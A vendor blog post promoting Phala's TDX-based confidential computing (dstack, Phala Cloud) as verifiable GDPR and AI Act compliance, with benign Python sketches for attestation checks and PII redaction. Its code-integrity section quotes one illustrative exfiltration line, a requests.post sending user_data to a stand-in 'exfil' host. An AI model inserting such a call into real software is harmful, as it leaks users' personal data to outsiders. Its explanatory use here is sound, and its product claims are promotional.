When GDPR meets LLMs: why TEE-based confidential computing is becoming the default answer for AI compliance
A Scene That's Playing Out Right Now
A European insurance company wants to use an LLM to process customer claims. The claims contain names, medical records, bank details — all protected under GDPR.
Their cloud provider offers what sounds like a perfect solution: deploy the model inside an encrypted VM. "Your data is safe," they say.
The legal team asks one question:
"Prove it."
Two words. The entire proposal collapses.
This isn't a technical problem. It's the question every AI product manager, security engineer, and compliance officer is facing in 2026: when AI handles sensitive data, "secure" has to mean verifiable — not just promised.
Three Questions Every AI Compliance Audit Will Ask
Any AI system that processes personal data needs to answer three questions at the compliance level:

- Where can the data go? Can the workload reach any network destination beyond what was agreed?
- What code is touching the data? Is the running binary the same one that was audited?
- Who can see the data while it's processed? Can the host, the hypervisor, or the operator read it?

These map to three technical domains: network isolation, code integrity, and memory protection. Miss any one, and the compliance evidence chain is incomplete.
The good news: TEE-based confidential computing can now provide verifiable answers to all three — not operational promises, but cryptographic proof.
How Phala Answers All Three
Phala offers two things: dstack, an open-source confidential computing platform, and Phala Cloud, a managed service built on top of it. Think of dstack as the open-source engine — it handles the hard problem of running AI workloads securely inside TEEs. Phala Cloud packages that capability as a turnkey service with monitoring, logging, ACLs, and compliance tooling.
Both are built on Intel TDX hardware-based trusted execution environments. Here's how they work together to answer the three compliance questions:
Proof #1: "This CVM cannot reach anything beyond the allowed list"
A cloud provider saying "we configured a firewall rule" means nothing to an auditor. What they need is proof that the rule is enforced and cannot be modified from inside the workload.
In the Phala Cloud architecture, inbound and outbound ACLs are enforced at the host OS layer — outside the CVM, outside the containers, in the operator-controlled layer that sits beyond the hardware isolation boundary. dstack, our open-source orchestrator, pushes these policies to every CVM. This means:
- No code inside the CVM can alter the ACL, even with root access
- Ingress and egress policies are enforced symmetrically, creating a complete network perimeter
- The policy hash is written into the TDX RTMR3 register, which means it becomes part of the remote attestation quote — any auditor with the quote can independently verify "this CVM's network restrictions match what was agreed to"
This is architecturally equivalent to GCP VPC Firewall or Azure NSG rules, but with one critical difference: the ACL policy is bound into the hardware attestation chain, not just sitting in a cloud console that only the provider can inspect.
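To make the auditor's side of this concrete, here is a minimal Python sketch of what the check could look like. It makes two simplifying assumptions: that the policy is canonicalized as sorted JSON and hashed with SHA-384 (TDX RTMRs are 48-byte SHA-384 registers), and that the attested value has already been extracted from a verified quote. In reality RTMR3 is an extend-only register, so a verifier replays the event log rather than comparing a single digest; the authoritative scheme is defined in the open-source dstack repo.

```python
import hashlib
import json

# Hypothetical ACL policy document agreed with the auditor.
policy = {
    "ingress": [{"proto": "tcp", "port": 443}],
    "egress": ["api.internal.example.com"],
}

# Canonicalize and hash the policy. SHA-384 is shown because TDX RTMRs
# are 48-byte SHA-384 registers; the exact canonicalization here is an
# assumption for this sketch.
policy_hash = hashlib.sha384(
    json.dumps(policy, sort_keys=True, separators=(",", ":")).encode()
).hexdigest()

# In a real audit this comes from the RTMR3 event log of a TDX quote
# that has already been verified (e.g. with Intel DCAP tooling).
attested_policy_hash = "<value from the verified quote's event log>"

if policy_hash == attested_policy_hash:
    print("ACL policy matches the attested measurement")
else:
    print("MISMATCH: the CVM was not launched with the agreed policy")
```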
Proof #2: "The code running inside this CVM does what the audit says it does"
This is the most important of the three proofs — and the one most organizations overlook.
A "secure" AI inference service that includes one extra line — requests.post("<https://exfil.example.com>", json=user_data) — renders every other security control meaningless. Network isolation can't catch what the app does through an authorized channel.
Phala's answer is a three-layer verification chain, with dstack's compose-hash at its center:
| Layer | What happens | Who can verify |
| --- | --- | --- |
| Source audit | A third-party security team reviews the workload source code, confirming no malicious logic | The auditor |
| Reproducible build | The same source, built on any machine, produces an identical binary hash (compose-hash) | Anyone |
| Hardware attestation (RTMR3) | The compose-hash is written into TDX's RTMR3 register and included in every remote attestation quote | Any quote verifier |
Together, these answer a concrete compliance question:
"The code was audited → the built result matches the audited source → the running binary hasn't been replaced → all of this is independently verifiable via TDX remote attestation."
You don't need to trust Phala. You don't need to trust the cloud provider. You only need to trust Intel's hardware security guarantees and open-source code you can read yourself.
dstack is fully open source under the Apache 2.0 license. An auditor can clone the repo, reproduce the build, and verify the compose-hash independently. Phala Cloud's deployment pipeline uses the same open-source dstack code — what runs in production is what's in the public repository.
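As an illustration, the reproducibility check can be as small as the following sketch. It assumes the compose-hash is a SHA-256 digest over the canonical app-compose manifest; the authoritative definition lives in the dstack repository, and the attested value would come from the RTMR3 event log of a verified production quote.

```python
import hashlib
from pathlib import Path

# Recompute the compose-hash from the audited source tree.
# Assumption for this sketch: the hash is SHA-256 over the canonical
# app-compose manifest; see the dstack repo for the exact scheme.
manifest = Path("app-compose.json").read_bytes()
local_hash = hashlib.sha256(manifest).hexdigest()

# Extracted from the RTMR3 event log of a verified production quote.
attested_hash = "<value from the verified quote's event log>"

print("verified" if local_hash == attested_hash else "MISMATCH")
```

If the two values agree, the audited source, the built artifact, and the running workload are linked by hashes an auditor can recompute on their own machine.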
Proof #3: "This CVM's memory cannot be read from the outside"
This is the headline capability of TEE technology.
Intel TDX creates an encrypted memory region at the CPU level. The hypervisor, the host operating system, and even the cloud platform administrator cannot read data inside it. From the outside, it's an opaque encrypted block — a "black box" in the literal sense.
For GDPR Article 32 (security of processing) and the AI Act's requirements for high-risk systems, this matters because:
- "We implement appropriate technical measures to protect personal data" stops being corporate boilerplate and becomes a fact you can prove with a TDX Quote
- The data processor (Phala / your cloud provider) cannot access data subjects' information; even under a court order, it cannot produce plaintext it is physically unable to read
This is the principle of technical impossibility — a stronger legal position than "we promise not to look."
An Honest Admission: No Single Technology Is a Silver Bullet
As powerful as these three proofs are in combination, we owe you one honest caveat:
No infrastructure-layer technology can 100% prevent data exfiltration.
Here's why: an audited AI workload, calling api.openai.com through an authorized channel to send an inference request, will transmit whatever the user typed — including any sensitive data in the prompt. No network firewall can inspect that, because at the application layer, it's a perfectly legitimate request.
This isn't a technology failure. It's the natural separation of security responsibilities:

- Layer 1, infrastructure isolation: encrypted memory and hardware attestation keep the host, hypervisor, and operator out
- Layer 2, workload integrity: verified code (compose-hash) and attested network policy (ACLs) pin down what runs and where it can connect
- Layer 3, data governance: deciding what data the application itself is allowed to send, and to whom

Each layer solves a different problem. TEE confidential computing, and specifically what Phala Cloud and dstack provide today, solves Layers 1 and 2. Layer 3 still requires organizational governance, just as the world's best safe doesn't decide what you choose to put inside it. A sketch of one such Layer 3 control follows.
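Here is a minimal, purely illustrative Python sketch of a Layer 3 control: redacting obvious PII before a prompt leaves the trust boundary. The patterns and function names are hypothetical; production deployments would use proper DLP and classification tooling rather than two regexes.

```python
import re

# Illustrative patterns only: real PII detection needs far more than this.
PATTERNS = {
    "iban": re.compile(r"\b[A-Z]{2}\d{2}[A-Z0-9]{11,30}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
}

def redact(prompt: str) -> str:
    """Replace recognizable PII with labeled placeholders before the
    prompt is sent to any external inference API."""
    for label, pattern in PATTERNS.items():
        prompt = pattern.sub(f"[{label.upper()} REDACTED]", prompt)
    return prompt

# Example: the IBAN and email never leave the trust boundary.
print(redact("Refund to DE89370400440532013000, notify max@example.com"))
```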
The 2026 Compliance Landscape
A clear trend is unfolding across the enterprises we work with:
- Insurance, financial services, and healthcare AI projects are shifting from "we need faster inference" to "we need provable data protection"
- The EU AI Act + GDPR combination means compliance is no longer the legal department's side project — it's a product infrastructure requirement
- TEE confidential computing is moving from "security research lab experiment" to "standard configuration for enterprise AI deployment"
This isn't hype. It's what we observe every day in conversations with customers, auditors, and engineering teams.
Phala Cloud is purpose-built to serve this transition. dstack provides the open-source foundation that auditors can inspect; Phala Cloud delivers the operational surface — ACLs, monitoring, key management, and attestation verification — that teams need to go to production.
Trust, But Verify
In 1987, Ronald Reagan quoted a Russian proverb to Gorbachev: "Trust, but verify."
Nearly 40 years later, it's the best summary of what AI data compliance demands.
Your AI infrastructure provider says your data is secure — can they prove it?
TEE confidential computing gives you a technically verifiable answer. Not "trust us," but "here is a TDX Quote — you can verify it on your own machine, using open-source tooling, without depending on any third party's word."
That's what privacy-preserving compute means for AI compliance.
Phala provides TEE-based confidential computing infrastructure. dstack is the open-source orchestration platform (Apache 2.0). Phala Cloud is the managed enterprise service. Both are built on Intel TDX. Learn more at docs.phala.com or explore dstack on GitHub.
